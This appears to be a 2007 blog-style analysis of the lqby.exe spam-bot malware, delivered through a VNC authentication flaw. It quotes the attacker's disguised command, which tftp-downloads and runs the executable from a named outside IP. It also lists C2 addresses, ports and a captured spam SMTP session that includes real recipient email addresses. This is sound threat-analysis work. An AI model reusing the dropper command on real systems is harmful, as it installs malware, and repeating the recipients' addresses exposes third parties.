lqby.exe: A Spam Server Virus

VNC authentication flaw results in the following command being issued to Server:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 12.206.65.226 GET lqby.exe & start lqby&

First off, who from? WHOIS query results in:

First off, the infector (whois 24.116.21.86): cableone.net is the dns host who is not approachable at this moment. But the virus server is not the same computer. This could possibly indicate that the bot net herders have (at least) dealings with Medicom Communications in terms of hosting and bandwidth provision. Just a thought. Whois 12.206.65.226:

AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC (NET-12-206-64-0-1)
12.206.64.0 - 12.206.127.255

This downloads a program called lqby.exe which is executed under the same name.

First off, some DNS lookups:

DNS Standard query A ypfqvazdls.qgcuyxdjqzwizgnkuhvt.com

DNS Standard query A ypfqvazdls.kangozip.com

Wow, these people go in for amazing keystroke combinations, not unlike what happens on my computer when the cats were kittens and they used to sleep on the laptop's keyboard, no doubt because it was nice and warm... And one day they even managed to take a screenshot, which i how I know how much garble they typed into notepad. I think I still have that screenshot somewhere. But that's off-topic.

Not entirely unsurprising, kangozip.com is from China. There is however, No match for domain "QGCUYXDJQZWIZGNKUHVT.COM". Not sure what that is all about, I've seen that before these queries for garble.domain. Perhaps it invokes something somewhere anyway?

There is an answer for the kango though: DNS Standard query response A 216.215.242.54

As soon as the cableone customer has dumped their dirty payload, lqby.exe begins to listen on UDP port 28356 and also TCP port 2044. And no sooner does the listening start, has a connection been made too, from 67.159.44.52 which doesn't seem to resolve into a name.

Either the infector has informed 67.159.44.52 of the successful infection of Server, or else the DNS lookups somehow triggered that. Either way, 67.159.44.52 now tells server what to do, word for word.

For the sake of "research" I have to be bad and let some packets out. (No actually, lazy. The last time I tried this one I set up VM's with all the IP addresses of the all the major mail providers, such as yahoo and aol and all that. But that was a lot of work.)

220 mta141.mail.ukl.yahoo.com ESMTP YSmtp service ready
HELO key1m53
250 mta141.mail.ukl.yahoo.com
MAIL FROM: <heribertocharlesdk@jamaicacoffeeshop.com.pt>
250 sender <heribertocharlesdk@jamaicacoffeeshop.com.pt> ok
RCPT TO: <lucymona@yahoo.co.uk>
250 recipient <lucymona@yahoo.co.uk> ok
RCPT TO: <andybfreeman@yahoo.co.uk>
250 recipient <andybfreeman@yahoo.co.uk> ok
RCPT TO: <lanaike@yahoo.co.uk>
250 recipient <lanaike@yahoo.co.uk> ok
DATA
354 go ahead
Message-ID: <000701c7764c$f3079160$439f2c34@jamaicacoffeeshop.com.pt>
Reply-To: "Heriberto Charles" <heribertocharlesdk@jamaicacoffeeshop.com.pt>
From: "Heriberto Charles" <heribertocharlesdk@jamaicacoffeeshop.com.pt>
To: <lucymona@yahoo.co.uk>,
.<andybfreeman@yahoo.co.uk>,
.<lanaike@yahoo.co.uk>
Subject: Cialas and Viagra are GREAT!!
Date: Tue, 03 Apr 2007 20:05:27 -0400
MIME-Version: 1.0
Content-Type: text/plain;
.format=flowed;
.charset="windows-1250"
.reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2869
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2962